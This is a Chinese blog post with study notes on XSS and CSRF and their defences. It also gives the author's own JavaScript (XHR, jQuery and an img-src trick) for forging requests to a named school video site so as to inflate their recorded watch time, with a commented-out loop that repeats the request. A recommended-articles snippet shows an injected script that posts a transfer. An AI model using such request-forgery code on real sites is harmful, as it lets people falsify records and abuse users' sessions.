实战xss、csrf

最新推荐文章于 2024-09-09 11:11:31 发布
最新推荐文章于 2024-09-09 11:11:31 发布
阅读量1.7k 收藏 1
点赞数 1
分类专栏: web前端 文章标签: csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yang_zongjun/article/details/51326367
版权

web安全很早就关注过,但是xss和csrf一直都是理论学习,今天有机会实战了下

先贴上onenote笔记:

XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。
来自 https://zh.wikipedia.org/wiki/%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0

xss(corss-site scripting跨站脚本攻击)
是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。
来自 https://cnodejs.org/topic/50463565329c5139760c34a1
其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie、破坏页面结构、重定向到其它网站等
来自 http://blog.csdn.net/ghsau/article/details/17027893

预防:
完善的过滤体系
永远不相信用户的输入。需要对用户的输入进行处理,只允许输入合法的值,其它值一概过滤掉

csrf(或写为xsrf)(cross site request forgery跨站请求伪造)
攻击者盗用了你的身份,以你的名义发送恶意请求
来自 http://www.cnblogs.com/hyddd/archive/2009/04/09/1432744.html
https://www.ibm.com/developerworks/cn/web/1102_niugang_csrf/
http://baike.baidu.com/link?url=HqKpIgsVgpO5Klb1FwKDFK__NSpk2as1UzsI-slWyNtMdjbXt-HctruALRA6dd-6nO17kWuhsrGj6ODqbaBulK
跨站请求攻击,简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份验证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的
来自 https://zh.wikipedia.org/wiki/%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0

实例:A在银行提交了一个form,产生了cookie并且没有过期,此时B伪造一个form发给A,A运行之后就会在后台利用之前的cookie提交表单,B就达到了伪造请求的目的

预防:一般都是通过服务器来预防:
验证 HTTP Referer 字段;在请求地址中添加 token 并验证;使用验证码

实战

比方说我在原来没有登陆功能的网站基础上添加了播放记录功能,本来可以直接在后台数据库改的,或者直接写个php手动更改我播放视频的记录,但是那样多无聊啊,我想用js来实现目的。
视频网,你登陆之后会记录用户的播放记录,然后学校有任务,说是你必须在此网站看很多的视频,看很长的时间
本地浏览器是在用户播放的情况下ajax上传到服务器,并修改记录,其实这里写图片描述
就是每隔3秒上传一次,告诉服务器“hi!我在看视频,你到数据库里把我当前看的视频记录时长+3s吧!”。

ajax跨域是不行的。。。

既然是ajax上传,我就写个原生ajax吧,

var xhr = new XMLHttpRequest();
    xhr.onload = function () {
        if(xhr.status >= 200 && xhr.status < 300 || xhr.status == 304) {
            console.log("success");
        } else {
            console.log("fail");
        }
    }
    xhr.open("get", "http://v.stuclub.cn/showrecord_handle.php?act=check&id=1187&ct=1132.373477&tottime=1456.610975", true);
    xhr.send();

结果是这样:这里写图片描述
很明显,我本地请求的ajax因为不是同源的,所以没有权限访问,然后换成jQuery的ajax方式,依旧不行:

$.ajax({

        type: "GET",
        url: "http://v.stuclub.cn/showrecord_handle.php?act=check&id=897&ct=1455&tottime=1456.610975",
        dataType: "text",
        success: function (data) {
            console.log("success");
        }
    });

算是简单的csrf(cross site request frogery)攻击了吧

换成了这种姿势:

window.onload = function() {
        var img = document.createElement("img");
        img.src="http://v.stuclub.cn/showrecord_handle.php?act=check&id=897&ct=1455&tottime=1456.610975";
        console.log("done");
        /*setInterval(function() {
            window.location.reload();
        }, 20);*/
    }

既使用img(或者是script、ifram)的src属性,来访问php文件并携带参数,可以看到此时请求的时候浏览器会自动带上之前正常观看视频时访问的cookie,然后伪造请求的目的就达到了啊。

奇特的是,我写了个setInterval来模拟刷新,但是没一会服务器安装的 服务器安全狗 把我给频闭了,说我刷新太频繁,估计是因为我的csrf攻击不是同源的,然后安全狗会当然就会阻止我不断刷新了啊

XSSCSRF 攻击详解
AzulSystems的博客
03-03 2185
在 Web 安全领域中,XSSCSRF 是最常见的攻击方式。简单的理解:XSS攻击:跨站脚本攻击。攻击者脚本 嵌入 被攻击网站,获取用户cookie等隐私信息。CSRF攻击:跨站请求伪造。已登录用户 访问 攻击者网站,攻击网站向被攻击网站发起恶意请求(利用浏览器会自动携带cookie)。XSS===XSS,即 Cross Site Script,中译是跨站脚本攻击。
xss,csrf
张大晴的博客
10-13 967
文章转自: csrf介绍: https://www.cnblogs.com/shytong/p/5308667.html http://www.cnblogs.com/hyddd/archive/2009/04/09/1432744.html https://www.cnblogs.com/cxying93/p/6035031.html xss介绍:https://www.cnblogs...
什么是CSRFCSRF漏洞原理攻击与防御(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
xiangxue888的博客
09-09 1437
什么是CSRFCSRF漏洞原理攻击与防御(非常详细)零基础入门到精通,收藏这一篇就够了
xsscsrf(详解)
qq_62046696的博客
06-30 4361
感觉自己的基础漏洞原理不太牢固,那就一起来复习一下吧!!!XSS的基本概念:XSS(Cross Site Scripting):跨域脚本攻击。XSS攻击原理:不需要你做任何的登录认证,它会通过合法的操作(比如在url中输入、在评论框中输入),向你的页面注入脚本(可能是js、hmtl代码块等)。大白话就是,他是再允许的范围内进行上传代码的操作,然后让被害者点击。XSS攻击后果:盗用Cookie破坏页面的正常结构,插入广告等恶意内容D-doss攻击3、XSS攻击后果:盗用Cookie破坏页面的正常结构,插入广告
XSRF(XSS+CSRF
weixin_30415801的博客
07-09 276
示例: 基本注入的时候,引入js文件。fish.js文件内容如下 $.post('http://localhost:3000/api/transfer', {user: 'zfkt', mone: 500}) 在表单中插入以下代码 <script src="http://locahost:3000/fish.js"></script> 转载于:...
XSSCSRF
sun_cainiao的博客
03-21 766
介绍两种最常见的针对 web 应用的攻击方式。 XSS (Cross-site scripting) 跨站脚本攻击 攻击者能够利用跨站脚本漏洞来绕过访问控制(access control),比如单源策略(same-origin policy)。 单源策略: 如果一个站点的内容有权限访问浏览器上的某些资源(比如 cookie),那么来自这个站点的所有内容都可以共享这些权限。 跨站点脚...
xss+csrf+html练习源码.rar_XSS_csrf_csrf源码_xss源码_xss练习源码
09-20
这个“xss+csrf+html练习源码.rar”文件提供了针对这些漏洞的实战练习,帮助安全研究人员或开发者加深对这些威胁的理解和防御能力。 XSS攻击主要分为反射型、存储型和DOM型三种类型。反射型XSS发生在用户点击链接...
阿里云PHP防注入脚本:实战防止XSSCSRF攻击
` 这样可以确保每次请求时对输入进行检查,防止注入和XSS攻击。这种方法适用于特定页面的临时保护。 2. **全局防护**:如果希望在整个网站范围内提供防御,可以在网站的公共配置文件(如数据库连接文件或模板头文件...
Web安全实验:跨站攻击(XSS+CSRF)原理与实战
实验内容包括使用Kali Linux工具对DVWA的XSSCSRF漏洞进行实战操作,同时要求理解各种级别的攻击以及修复策略。实验报告应详细记录整个过程,包括攻击步骤、观察结果和修复建议。 在进行此类实验时,重要的是要...
Web 安全之 XSSCSRF
技术小屋
04-08 302
前言 目前web的安全问题主要有下面几个: XSS漏洞 CSRF漏洞 XSS 跨站脚本攻击(Cross Site Scripting),攻击者往 Web 页面插入恶意的 Script 脚本代码,当用户访问页面的时候,嵌入的脚本代码就会执行,这样,攻击者可以通过 Script 脚本代码获取用户的 cookie 等信息,模拟用户的请求等达到攻击目的。 XSS 分类 存储型:X...
XSSCSRF漏洞源码练习及HTML注入案例分析
资源摘要信息: "xss+csrf+html练习源码.rar_XSS_csrf_csrf源码_xss源码_xss练习源码" 描述中提到的“xss反射存储型的+csrf+html注入老网站的练习源码”涉及到了三种网络安全领域的重要概念:跨站脚本攻击(XSS)、...
XSS+CSRF组合拳
weixin_50464560的博客
03-12 2529
0x00 前言 今天学习一下 XSS + CSRF 组合拳,现将笔记记录如下。 0x01 靶场环境 本机(Win):192.168.38.1 DVWA(Win):192.168.38.132 Beef(Kali):192.168.38.129 0x02 组合拳思路 第一拳:存储型 XSS + CSRF(存储型 XSS 攻击代码中加入 CSRF 代码链接) 第二拳:CSRF + SelfXSSCSRF 代码中加入 SelfXSS 代码) 0x03...
XSS攻击与CSRF攻击
热门推荐
Dax1_的博客
04-08 1万+
XSS攻击 什么是XSS Cross-Site Scripting(跨站脚本攻击),简称XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如Cookie、SessionID等,进而危害数据安全 XSS的注入方法 简单来说,任何可以输入的地方都有可能引起XSS攻击,包括URL 在HTML内嵌的文本中,恶意内容以script标签形成注入 在内联的JavaScript中,拼接的数据突破了原本的限制(字符串,变量,方法名)等 在标
CSRFXSS
hcy48的博客
10-06 557
http://www.cnblogs.com/hyddd/archive/2009/04/09/1432744.html 讲的CSRF不错,简单易懂http://www.cnblogs.com/easytools/archive/2012/06/01/2529350.html 讲CSRFXSS区别,简单一段文字XSS 全称“跨站脚本”,是注入攻击的一种。其特点是不对服务器端造成任何伤害,而是通
XSS攻击+CSRF攻击
weixin_34198583的博客
08-29 235
XSS攻击 一旦在DOM解析过程成出现不在预期内的改变(JS代码执行或样式大量变化时),就可能发生XSS攻击 XSS分为反射型XSS,存储型XSS和DOM XSS 反射型XSS是在将XSS代码放在URL中,将参数提交到服务器。服务器解析后响应,在响应结果中存在XSS代码,最终通过浏览器解析执行。 存储型XSS是将XSS代码存储到服务端(数据库、内存、文件系统等),在下次请求同一个页面时就不需要带...
CSRF理解和实战
weixin_30266885的博客
10-12 369
目录 啥是CSRF攻击 写一个CSRF攻击 如何避免CSRF攻击 啥是CSRF攻击 CSRF(Cross-site request forgery)跨站请求伪造,CSRF通过伪装来自受信任用户的请求来利用受信任的网站,也就是说,请求是攻击者伪造了请求,使服务器以为是用户发起的。CSRF通常由以下流程构成: 以下引自(https://juejin.im/post/5bc009996fb9a05d...
XSSCSRF详解
Sylon的博客
06-24 2839
XSSCSRF详解 随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显。 黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则...
前端技能树,面试复习第 36 天—— 浏览器原理:如何预防 XSS 攻击与 CSRF 攻击
前端进阶之路 | 中大厂、外企、国企内推 | 面试培训 | 简历修改
07-24 344
XSS 攻击指的是跨站脚本攻击,是一种代码注入攻击。攻击者通过在网站注入恶意脚本,使之在用户的浏览器上运行,从而**盗取用户的信息如 cookie 等。XSS 的本质是因为网站没有对恶意代码进行过滤,与正常的代码混合在一起了,浏览器没有办法分辨哪些脚本是可信的,从而导致了恶意代码的执行。...
PHP相关系列 - XSS相关
自娱自乐的代码人
09-12 1869
关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造) 我们常说的网络安全其实应该包括以下三方面的安全: 1、机密性,比如用户的隐私被窃取,帐号被盗,常见的方式是木马。 2、完整性,比如数据的完整,举个例子,康熙传位十四子,被当时四阿哥篡改遗诏:传位于四子,当然这是传说,常见的方式是XSS跨站脚本攻击和csrf跨站请求伪造。 3、可用性,比如我们的网络服务是否可用,常用的攻击方式是dos和d
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值